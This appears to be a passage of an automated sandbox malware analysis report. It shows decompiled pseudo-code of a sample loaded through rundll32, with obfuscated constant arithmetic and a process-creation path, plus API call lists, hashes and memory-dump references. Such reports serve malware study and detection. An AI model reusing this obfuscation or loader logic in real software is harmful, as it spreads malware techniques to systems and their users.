                                                                                                                                                            0x0037ff84
                                                                                                                                                            0x0037ff87

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FolderPath
                                                                                                                                                            • String ID: '+=$F8y$PG&$Qec$RYt$oq$wpc$zn $Y
                                                                                                                                                            • API String ID: 1514166925-3316477785
                                                                                                                                                            • Opcode ID: 7439af5cd0d6b6030691669be3a6ad094b1abd6b95bd20a7a0a58586a92dbb14
                                                                                                                                                            • Instruction ID: c612a5e83176d82ee95a45956fecef8b34c88e640d5ee7964b4c70c22831f0df
                                                                                                                                                            • Opcode Fuzzy Hash: 7439af5cd0d6b6030691669be3a6ad094b1abd6b95bd20a7a0a58586a92dbb14
                                                                                                                                                            • Instruction Fuzzy Hash: 290222725083809FD369CF25C58AA1BFBE2BBC5718F108A1DF1D986260D7B98949CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 267 37e991-37ea60 268 37ea62-37ea77 call 37f8fd 267->268 269 37ea90-37ea96 267->269 268->269 272 37ea79-37ea88 call 3793ed 268->272 274 37ea8d 272->274 274->269
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			_entry_(intOrPtr _a4, char _a8) {
                                                                                                                                                            				unsigned int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                            				signed int _t85;
                                                                                                                                                            				signed int _t86;
                                                                                                                                                            				signed int _t87;
                                                                                                                                                            
                                                                                                                                                            				_v32 = _v32 & 0x00000000;
                                                                                                                                                            				_v44 = 0xa88528;
                                                                                                                                                            				_v40 = 0x811176;
                                                                                                                                                            				_v36 = 0xed2c64;
                                                                                                                                                            				_v20 = 0x893932;
                                                                                                                                                            				_v20 = _v20 ^ 0x2faf083b;
                                                                                                                                                            				_v20 = _v20 ^ 0x2f2d1c53;
                                                                                                                                                            				_v8 = 0xbe2d1;
                                                                                                                                                            				_t85 = 0x2e;
                                                                                                                                                            				_v8 = _v8 / _t85;
                                                                                                                                                            				_v8 = _v8 >> 0xd;
                                                                                                                                                            				_v8 = _v8 + 0xffff961f;
                                                                                                                                                            				_v8 = _v8 ^ 0xfff451d0;
                                                                                                                                                            				_v16 = 0x50855f;
                                                                                                                                                            				_v16 = _v16 >> 8;
                                                                                                                                                            				_t86 = 0x5e;
                                                                                                                                                            				_v16 = _v16 / _t86;
                                                                                                                                                            				_v16 = _v16 ^ 0x0002614f;
                                                                                                                                                            				_v28 = 0x752e5d;
                                                                                                                                                            				_t36 =  &_v28; // 0x752e5d
                                                                                                                                                            				_t87 = 0x4e;
                                                                                                                                                            				_v28 =  *_t36 * 0x6f;
                                                                                                                                                            				_v28 = _v28 ^ 0x32c1ec83;
                                                                                                                                                            				_v12 = 0xba9db2;
                                                                                                                                                            				_v12 = _v12 * 0x41;
                                                                                                                                                            				_v12 = _v12 + 0xfc46;
                                                                                                                                                            				_v12 = _v12 | 0x4911db39;
                                                                                                                                                            				_v12 = _v12 ^ 0x6f7f0271;
                                                                                                                                                            				_v24 = 0x2e0372;
                                                                                                                                                            				_v24 = _v24 / _t87;
                                                                                                                                                            				_v24 = _v24 ^ 0x000c7ca5;
                                                                                                                                                            				_t58 =  &_a8;
                                                                                                                                                            				 *_t58 = _a8 - 1;
                                                                                                                                                            				if( *_t58 == 0) {
                                                                                                                                                            					 *0x39320c = _a4;
                                                                                                                                                            					if(E0037F8FD() != 0) {
                                                                                                                                                            						E003793ED(); // executed
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				return 1;
                                                                                                                                                            			}

















                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                            • String ID: ].u$d,
                                                                                                                                                            • API String ID: 621844428-1507873175
                                                                                                                                                            • Opcode ID: f26fa05cdc3f6213229a8a0b5dc721123378c9631898e5114ccd8f7410b342db
                                                                                                                                                            • Instruction ID: b1f31280166f262dc69fbdb82430346aacfc3d3e1514808502a283d22ae42029
                                                                                                                                                            • Opcode Fuzzy Hash: f26fa05cdc3f6213229a8a0b5dc721123378c9631898e5114ccd8f7410b342db
                                                                                                                                                            • Instruction Fuzzy Hash: 0231F4B1D00209EBDB18DFA4C98A6DEBBF0FB54304F20C199D514BB250D7B45B859F80
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            control_flow_graph 288 37ab87-37ad94 call 3820b9 call 374b61 call 377f5d 294 37ad99-37ad9e 288->294 295 37ada0-37ada2 294->295 296 37addd 294->296 298 37ada4-37adaa 295->298 299 37adb0-37addb call 381e67 * 2 295->299 297 37addf-37ade5 296->297 300 37adab-37adae 298->300 299->300 300->297
                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                            			E0037AB87(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                            				void* _t151;
                                                                                                                                                            				void* _t163;
                                                                                                                                                            				void* _t164;
                                                                                                                                                            				signed int _t169;
                                                                                                                                                            				signed int _t170;
                                                                                                                                                            				signed int _t171;
                                                                                                                                                            				intOrPtr _t187;
                                                                                                                                                            				intOrPtr _t190;
                                                                                                                                                            				intOrPtr* _t193;
                                                                                                                                                            				void* _t194;
                                                                                                                                                            
                                                                                                                                                            				_t193 = _t194 - 0x5c;
                                                                                                                                                            				_push( *((intOrPtr*)(_t193 + 0x7c)));
                                                                                                                                                            				_t187 =  *((intOrPtr*)(_t193 + 0x6c));
                                                                                                                                                            				_push( *((intOrPtr*)(_t193 + 0x78)));
                                                                                                                                                            				_push(0);
                                                                                                                                                            				_push( *((intOrPtr*)(_t193 + 0x70)));
                                                                                                                                                            				_push(_t187);
                                                                                                                                                            				_push( *((intOrPtr*)(_t193 + 0x68)));
                                                                                                                                                            				_push( *((intOrPtr*)(_t193 + 0x64)));
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t151);
                                                                                                                                                            				 *(_t193 + 0x18) =  *(_t193 + 0x18) & 0x00000000;
                                                                                                                                                            				 *((intOrPtr*)(_t193 + 0xc)) = 0xc7e504;
                                                                                                                                                            				 *((intOrPtr*)(_t193 + 0x10)) = 0xaf8af2;
                                                                                                                                                            				 *((intOrPtr*)(_t193 + 0x14)) = 0x514a6e;
                                                                                                                                                            				 *(_t193 + 0x34) = 0xb35e3d;
                                                                                                                                                            				 *(_t193 + 0x34) =  *(_t193 + 0x34) >> 0xc;
                                                                                                                                                            				 *(_t193 + 0x34) =  *(_t193 + 0x34) ^ 0x00059917;
                                                                                                                                                            				 *(_t193 + 0x1c) = 0xb39a57;
                                                                                                                                                            				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb15fb5d5;
                                                                                                                                                            				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb1e87bcb;
                                                                                                                                                            				 *(_t193 + 0x54) = 0x8cfebd;
                                                                                                                                                            				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x2de11ebd;
                                                                                                                                                            				 *(_t193 + 0x54) =  *(_t193 + 0x54) >> 7;
                                                                                                                                                            				_t169 = 0x1d;
                                                                                                                                                            				 *(_t193 + 0x54) =  *(_t193 + 0x54) / _t169;
                                                                                                                                                            				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x0009bd52;
                                                                                                                                                            				 *(_t193 + 0x24) = 0xadd23a;
                                                                                                                                                            				 *(_t193 + 0x24) =  *(_t193 + 0x24) + 0xffffea89;
                                                                                                                                                            				 *(_t193 + 0x24) =  *(_t193 + 0x24) ^ 0x00a2a736;
                                                                                                                                                            				 *(_t193 + 0x20) = 0x1d5481;
                                                                                                                                                            				 *(_t193 + 0x20) =  *(_t193 + 0x20) | 0x53ff6cee;
                                                                                                                                                            				 *(_t193 + 0x20) =  *(_t193 + 0x20) ^ 0x53f584ee;
                                                                                                                                                            				 *(_t193 + 0x2c) = 0x3c40b3;
                                                                                                                                                            				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) + 0xffffdf55;
                                                                                                                                                            				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) ^ 0x0031ac36;
                                                                                                                                                            				 *(_t193 + 0x3c) = 0x52e0cb;
                                                                                                                                                            				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44a49456;
                                                                                                                                                            				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44f1a540;
                                                                                                                                                            				 *(_t193 + 0x4c) = 0x46a878;
                                                                                                                                                            				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) << 0xf;
                                                                                                                                                            				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) + 0xffff6c50;
                                                                                                                                                            				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) ^ 0x5431f96e;
                                                                                                                                                            				 *(_t193 + 0x30) = 0x13da24;
                                                                                                                                                            				 *(_t193 + 0x30) =  *(_t193 + 0x30) << 1;
                                                                                                                                                            				 *(_t193 + 0x30) =  *(_t193 + 0x30) ^ 0x002ba36f;
                                                                                                                                                            				 *(_t193 + 0x44) = 0xdb90c5;
                                                                                                                                                            				 *(_t193 + 0x44) =  *(_t193 + 0x44) << 0xf;
                                                                                                                                                            				 *(_t193 + 0x44) =  *(_t193 + 0x44) + 0x7bf2;
                                                                                                                                                            				 *(_t193 + 0x44) =  *(_t193 + 0x44) ^ 0xc86621d2;
                                                                                                                                                            				 *(_t193 + 0x38) = 0xc3d0db;
                                                                                                                                                            				 *(_t193 + 0x38) =  *(_t193 + 0x38) << 0xf;
                                                                                                                                                            				 *(_t193 + 0x38) =  *(_t193 + 0x38) ^ 0xe86994ab;
                                                                                                                                                            				 *(_t193 + 0x58) = 0x1a470a;
                                                                                                                                                            				 *(_t193 + 0x58) =  *(_t193 + 0x58) << 1;
                                                                                                                                                            				 *(_t193 + 0x58) =  *(_t193 + 0x58) + 0x63a7;
                                                                                                                                                            				 *(_t193 + 0x58) =  *(_t193 + 0x58) | 0x340679df;
                                                                                                                                                            				 *(_t193 + 0x58) =  *(_t193 + 0x58) ^ 0x343a3883;
                                                                                                                                                            				 *(_t193 + 0x40) = 0xc6f633;
                                                                                                                                                            				 *(_t193 + 0x40) =  *(_t193 + 0x40) << 3;
                                                                                                                                                            				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x74163c66;
                                                                                                                                                            				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x722ef2ae;
                                                                                                                                                            				 *(_t193 + 0x50) = 0xa2e0bb;
                                                                                                                                                            				_t170 = 0x56;
                                                                                                                                                            				 *(_t193 + 0x50) =  *(_t193 + 0x50) / _t170;
                                                                                                                                                            				 *(_t193 + 0x50) =  *(_t193 + 0x50) + 0x1f8a;
                                                                                                                                                            				 *(_t193 + 0x50) =  *(_t193 + 0x50) * 0x7f;
                                                                                                                                                            				 *(_t193 + 0x50) =  *(_t193 + 0x50) ^ 0x01094e1c;
                                                                                                                                                            				 *(_t193 + 0x28) = 0x4b9267;
                                                                                                                                                            				_t171 = 0x28;
                                                                                                                                                            				_t115 = _t193 - 0x48; // 0x181c8bbc
                                                                                                                                                            				_t172 = _t115;
                                                                                                                                                            				 *(_t193 + 0x28) =  *(_t193 + 0x28) / _t171;
                                                                                                                                                            				 *(_t193 + 0x28) =  *(_t193 + 0x28) ^ 0x00093005;
                                                                                                                                                            				 *(_t193 + 0x48) = 0xd50758;
                                                                                                                                                            				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0x7d3d0603;
                                                                                                                                                            				 *(_t193 + 0x48) =  *(_t193 + 0x48) << 9;
                                                                                                                                                            				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0xd00f781a;
                                                                                                                                                            				_push( *(_t193 + 0x1c));
                                                                                                                                                            				_push( *(_t193 + 0x34));
                                                                                                                                                            				_t190 = 0x44;
                                                                                                                                                            				E00374B61(_t115, _t190);
                                                                                                                                                            				 *((intOrPtr*)(_t193 - 0x48)) = _t190;
                                                                                                                                                            				_t129 = _t193 - 4; // 0x181c8c00
                                                                                                                                                            				_t131 = _t193 - 0x48; // 0x181c8bbc
                                                                                                                                                            				_t163 = E00377F5D(_t115, _t172,  *((intOrPtr*)(_t193 + 0x70)), _t172, _t131, _t172, _t172,  *((intOrPtr*)(_t193 + 0x64)),  *(_t193 + 0x24),  *(_t193 + 0x20),  *(_t193 + 0x2c),  *(_t193 + 0x3c),  *(_t193 + 0x4c),  *((intOrPtr*)(_t193 + 0x78)), _t129); // executed
                                                                                                                                                            				if(_t163 == 0) {
                                                                                                                                                            					_t164 = 0;
                                                                                                                                                            				} else {
                                                                                                                                                            					if(_t187 == 0) {
                                                                                                                                                            						E00381E67( *(_t193 + 0x30),  *(_t193 + 0x44),  *(_t193 + 0x38),  *(_t193 + 0x58),  *((intOrPtr*)(_t193 - 4)));
                                                                                                                                                            						E00381E67( *(_t193 + 0x40),  *(_t193 + 0x50),  *(_t193 + 0x28),  *(_t193 + 0x48),  *_t193);
                                                                                                                                                            					} else {
                                                                                                                                                            						asm("movsd");
                                                                                                                                                            						asm("movsd");
                                                                                                                                                            						asm("movsd");
                                                                                                                                                            						asm("movsd");
                                                                                                                                                            					}
                                                                                                                                                            					_t164 = 1;
                                                                                                                                                            				}
                                                                                                                                                            				return _t164;
                                                                                                                                                            			}













                                                                                                                                                            0x0037accd
                                                                                                                                                            0x0037acd4
                                                                                                                                                            0x0037acdb
                                                                                                                                                            0x0037ace2
                                                                                                                                                            0x0037ace9
                                                                                                                                                            0x0037aced
                                                                                                                                                            0x0037acf4
                                                                                                                                                            0x0037acfb
                                                                                                                                                            0x0037ad05
                                                                                                                                                            0x0037ad08
                                                                                                                                                            0x0037ad0b
                                                                                                                                                            0x0037ad16
                                                                                                                                                            0x0037ad19
                                                                                                                                                            0x0037ad20
                                                                                                                                                            0x0037ad2c
                                                                                                                                                            0x0037ad31
                                                                                                                                                            0x0037ad31
                                                                                                                                                            0x0037ad34
                                                                                                                                                            0x0037ad37
                                                                                                                                                            0x0037ad3e
                                                                                                                                                            0x0037ad45
                                                                                                                                                            0x0037ad4c
                                                                                                                                                            0x0037ad50
                                                                                                                                                            0x0037ad57
                                                                                                                                                            0x0037ad5a
                                                                                                                                                            0x0037ad5f
                                                                                                                                                            0x0037ad62
                                                                                                                                                            0x0037ad6a
                                                                                                                                                            0x0037ad6d
                                                                                                                                                            0x0037ad74
                                                                                                                                                            0x0037ad94
                                                                                                                                                            0x0037ad9e
                                                                                                                                                            0x0037addd
                                                                                                                                                            0x0037ada0
                                                                                                                                                            0x0037ada2
                                                                                                                                                            0x0037adbf
                                                                                                                                                            0x0037add3
                                                                                                                                                            0x0037ada4
                                                                                                                                                            0x0037ada7
                                                                                                                                                            0x0037ada8
                                                                                                                                                            0x0037ada9
                                                                                                                                                            0x0037adaa
                                                                                                                                                            0x0037adaa
                                                                                                                                                            0x0037adad
                                                                                                                                                            0x0037adad
                                                                                                                                                            0x0037ade5

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                            • String ID: nJQ
                                                                                                                                                            • API String ID: 963392458-2884827605
                                                                                                                                                            • Opcode ID: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
                                                                                                                                                            • Instruction ID: 1d178c6cd09fceaa68ff5cccb401516988d28b84466b9f1f42b5dad158f2c90e
                                                                                                                                                            • Opcode Fuzzy Hash: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
                                                                                                                                                            • Instruction Fuzzy Hash: 8671F272400288EBCF69CFA4C9498CE3BA5FF48358F118119FE1A96224D3B6D969DF45
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                                                            APIs
                                                                                                                                                            • _malloc.LIBCMT ref: 10006A9C
                                                                                                                                                              • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                                                              • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                                                              • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateHeap_malloc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 501242067-0
                                                                                                                                                            • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                                                            • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                                                            • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                                                            • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                                                            • GlobalHandle.KERNEL32(002B89A8), ref: 100208A9
                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                                                            • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                                                            • GlobalHandle.KERNEL32(002B89A8), ref: 100208DB
                                                                                                                                                            • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                                                            • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                                                            • _memset.LIBCMT ref: 10020911
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 496899490-0
                                                                                                                                                            • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                                                            • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                                                            • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                                                            • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • __lock.LIBCMT ref: 1002FA87
                                                                                                                                                              • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                                                              • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                                                              • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                                                            • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                                                            • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                                                            • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2714421763-0
                                                                                                                                                            • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                                                            • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                                                            • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                                                            • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            control_flow_graph 220 10001b80-10001b90 221 10001b92-10001b97 220->221 222 10001b9c-10001ba8 220->222 223 10001c9c-10001c9f 221->223 224 10001c04-10001c66 222->224 225 10001baa-10001bb5 222->225 228 10001c74-10001c91 VirtualProtect 224->228 229 10001c68-10001c71 224->229 226 10001bb7-10001bbe 225->226 227 10001bfa-10001bff 225->227 230 10001bc0-10001bce 226->230 231 10001be2-10001bf4 VirtualFree 226->231 227->223 232 10001c93-10001c95 228->232 233 10001c97 228->233 229->228 230->231 234 10001bd0-10001be0 230->234 231->227 232->223 233->223 234->227 234->231
                                                                                                                                                            APIs
                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,?,00004000,?,10001E18,00000001,00000000,?,100025E8,?,?,?,?,100025E8,00000000,00000000), ref: 10001BF4
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FreeVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1263568516-0
                                                                                                                                                            • Opcode ID: dd38d51ca3a6b672f32aeaf0fb246c4496e8ccb210392943b19121075d5be09d
                                                                                                                                                            • Instruction ID: 749d9464b473a0839557e7d3f54d457581c14e70089049c47b2cfbba366a5d19
                                                                                                                                                            • Opcode Fuzzy Hash: dd38d51ca3a6b672f32aeaf0fb246c4496e8ccb210392943b19121075d5be09d
                                                                                                                                                            • Instruction Fuzzy Hash: 5841B9746002099FEB48CF58C490FA9B7B2FB88350F14C659E81A9F395D731EE41CB84
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            control_flow_graph 235 10036624-10036642 HeapCreate 236 10036647-10036654 call 100365c9 235->236 237 10036644-10036646 235->237 240 10036656-10036663 call 10035aca 236->240 241 1003667a-1003667d 236->241 240->241 244 10036665-10036678 HeapDestroy 240->244 244->237
                                                                                                                                                            APIs
                                                                                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                                                            • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                                                            Memory Dump Source
